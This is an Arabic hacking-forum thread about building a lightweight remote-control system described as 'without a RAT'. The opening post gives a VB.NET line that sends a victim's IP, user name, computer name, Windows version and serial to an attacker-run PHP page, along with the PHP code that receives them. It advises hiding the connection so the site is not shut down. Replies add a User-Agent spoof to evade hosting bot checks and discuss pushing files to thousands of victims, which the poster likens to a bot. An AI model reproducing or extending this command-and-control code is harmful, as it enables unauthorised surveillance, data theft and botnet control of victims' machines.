[ فكرة ] موقع للأتصال بالضحية . بدون RAT

تم تحميل الصفحة في 0,7461307 ثانية
موقع للأتصال بالضحية . بدون RAT

A3DaMx

Php c0d3r / .nEt
rankrankrank
إنضم
30 يوليو 2014
المشاركات
614
الإعجابات
484
النقاط
63
السلام عليكم ,


حبيت انقلكم تجربتي عن مشروعي القديم

من خلال اتصال الضحية بموقع , و استقبال الاوامر من الموقع

الامر كله في الموقع عبارة عن $_GET لماذا ؟ لأن برسل معلومات من خلال ال vb.net , و الموقع راح يستقبلها

w.DownloadString(FTPL & "co.php?hi&ip=" & ip & "&user=" & user & "&cname=" & cname & "&country=" & country & "&date=" & date1 & "&windows=" & windows & "&serial=" & serial)

مثل كذا ارسل المعلومات و استقبلها كالتالي و بأمكاني أدخالها قاعدة البيانات الخ ..

PHP:
$ip = $_GET["ip"];
    $namepc = $_GET["namepc"];
    $cname = $_GET["cname"];
    $country = $_GET["country"];
    $date1 = $_GET["date"];
    $win = $_GET["win"];
# !

هذي الفكرة العامة بسيطة و سهله جداً و بأمكانكم تطوير الافضل !

واجهت مشاكل منها :

بعض الاستضافات لديها حماية لكي تتحقق انك لست BOT
اخطاْ بكود الـ .net ( لأني لست بارع فيه )
المواقع الي أجلب منها ال IP كان لها عدد معين مثل 200 ريكوست باليوم


# !

المميزات كانت كثيرة و بحط لكم فديو بسيط عنها


# !


حجم السيرفر 19kb

جيت اطرح الفكرة و امشي لأن مالي خلق اكمل فيه و انا تركت هالمجال
اتركو مرض الـ RAT الخبيت !

* كل المشاكل الي واجهتها بأمكانكم حلها و صنع ماهو افضل *
* و انصحكم بوضع الاتصال غير مباشر ! لأان موقعك ممكن يتقفل *


# !

الموضوع ليس فرد عضالات و انما فكرة و اتمنى تطويرها من الكل

و السلام عليكم ..,
 

TempHacker

Beginner Developer
rank
إنضم
22 يوليو 2019
المشاركات
3
الإعجابات
3
النقاط
3
العمر
23
بالنسبة للاستضافات التي لديها حماية من أنك لست بوت

فقط أضف في Headers Request

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
 

A3DaMx

Php c0d3r / .nEt
rankrankrank
إنضم
30 يوليو 2014
المشاركات
614
الإعجابات
484
النقاط
63
مشكلة الاستضافة محلولة اخي الكريم ، بإمكانك حجز سيرفر كامل بدون موارد مشتركة وتنحل مشكلتك من الاساس
يب صدقت ف اتوقع الفكرة جميلة لمن يريد تطبيقها و صنع خصائص بنفسه
 

invocker

Beginner Developer
rank
إنضم
21 سبتمبر 2016
المشاركات
50
الإعجابات
21
النقاط
8
السلام عليكم ,


حبيت انقلكم تجربتي عن مشروعي القديم

من خلال اتصال الضحية بموقع , و استقبال الاوامر من الموقع

الامر كله في الموقع عبارة عن $_GET لماذا ؟ لأن برسل معلومات من خلال ال vb.net , و الموقع راح يستقبلها

w.DownloadString(FTPL & "co.php?hi&ip=" & ip & "&user=" & user & "&cname=" & cname & "&country=" & country & "&date=" & date1 & "&windows=" & windows & "&serial=" & serial)

مثل كذا ارسل المعلومات و استقبلها كالتالي و بأمكاني أدخالها قاعدة البيانات الخ ..

PHP:
$ip = $_GET["ip"];
    $namepc = $_GET["namepc"];
    $cname = $_GET["cname"];
    $country = $_GET["country"];
    $date1 = $_GET["date"];
    $win = $_GET["win"];
# !

هذي الفكرة العامة بسيطة و سهله جداً و بأمكانكم تطوير الافضل !

واجهت مشاكل منها :

بعض الاستضافات لديها حماية لكي تتحقق انك لست BOT
اخطاْ بكود الـ .net ( لأني لست بارع فيه )
المواقع الي أجلب منها ال IP كان لها عدد معين مثل 200 ريكوست باليوم


# !

المميزات كانت كثيرة و بحط لكم فديو بسيط عنها


# !


حجم السيرفر 19kb

جيت اطرح الفكرة و امشي لأن مالي خلق اكمل فيه و انا تركت هالمجال
اتركو مرض الـ RAT الخبيت !

* كل المشاكل الي واجهتها بأمكانكم حلها و صنع ماهو افضل *
* و انصحكم بوضع الاتصال غير مباشر ! لأان موقعك ممكن يتقفل *


# !

الموضوع ليس فرد عضالات و انما فكرة و اتمنى تطويرها من الكل

و السلام عليكم ..,
بارك الله فيك لو تشرح شرح مفصل من بداية الرفع للاستضافة حتى وصول التبليغ لاني ما اعرف صراحة طريقة الاستعمال اكون شاكر جدا
 

A3DaMx

Php c0d3r / .nEt
rankrankrank
إنضم
30 يوليو 2014
المشاركات
614
الإعجابات
484
النقاط
63
بارك الله فيك لو تشرح شرح مفصل من بداية الرفع للاستضافة حتى وصول التبليغ لاني ما اعرف صراحة طريقة الاستعمال اكون شاكر جدا
بسوي شرح فديو بسيط للفكرة و ليس تطبيق . ,
 

A3DaMx

Php c0d3r / .nEt
rankrankrank
إنضم
30 يوليو 2014
المشاركات
614
الإعجابات
484
النقاط
63
للي مافهم الفكرة هذا شي بسيط . قيس عليه انك تقدر ترسل معلومات الجهاز كامله الخ ..
و بأمكانك ادخالها لقاعدة البيانات ##
و تقدر تستقبل اوامر من الموقع ..

 

vivin

skype: vivin_2006_0
rank
إنضم
12 مايو 2013
المشاركات
143
الإعجابات
79
النقاط
28
اخى كنت قد كلمت احد المبرمجين على تكويد اسكربت يشبة اسكربتك

ويعمل بنفس الطريقة حيث يتم ارسال ملف لكل كل الضحايا بضغطة زر

ولكن لى سوال اذا افترضنا اننا وفرنا استضافة ذات امكانيات جيدة سيرفر مثلا

هل يمكن انزال ملف الى الضحايا عددهم يتجاوز الالاف وتحديث هذا الملف من فترة لاخرى

ام ان تلك الطريقة لن تجدى نفعا مع العدد الضخم من الضحايا
 

A3DaMx

Php c0d3r / .nEt
rankrankrank
إنضم
30 يوليو 2014
المشاركات
614
الإعجابات
484
النقاط
63
اخى كنت قد كلمت احد المبرمجين على تكويد اسكربت يشبة اسكربتك

ويعمل بنفس الطريقة حيث يتم ارسال ملف لكل كل الضحايا بضغطة زر

ولكن لى سوال اذا افترضنا اننا وفرنا استضافة ذات امكانيات جيدة سيرفر مثلا

هل يمكن انزال ملف الى الضحايا عددهم يتجاوز الالاف وتحديث هذا الملف من فترة لاخرى

ام ان تلك الطريقة لن تجدى نفعا مع العدد الضخم من الضحايا
لو انها ماتجدي نفع ماكن فيه شي اسمه بوت ن*
تقدر لكن حاول تشوف الموقع كم يسمح ب ريكوست و زيد هالعدد للي تبي
و كمان من الممكن قاعدة البيانات لها ريكوستات معينة و لازم تعدل عليها
و اكواد ال php لازم تضمن اقفال قاعدة البيانات " mysqli_close "
بحيث مايصير فيه تعليق عند الاتصال
ممكن هالنصائح تفيدك و اتمنى انها تفيدك
 
الإعجابات: vivin

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل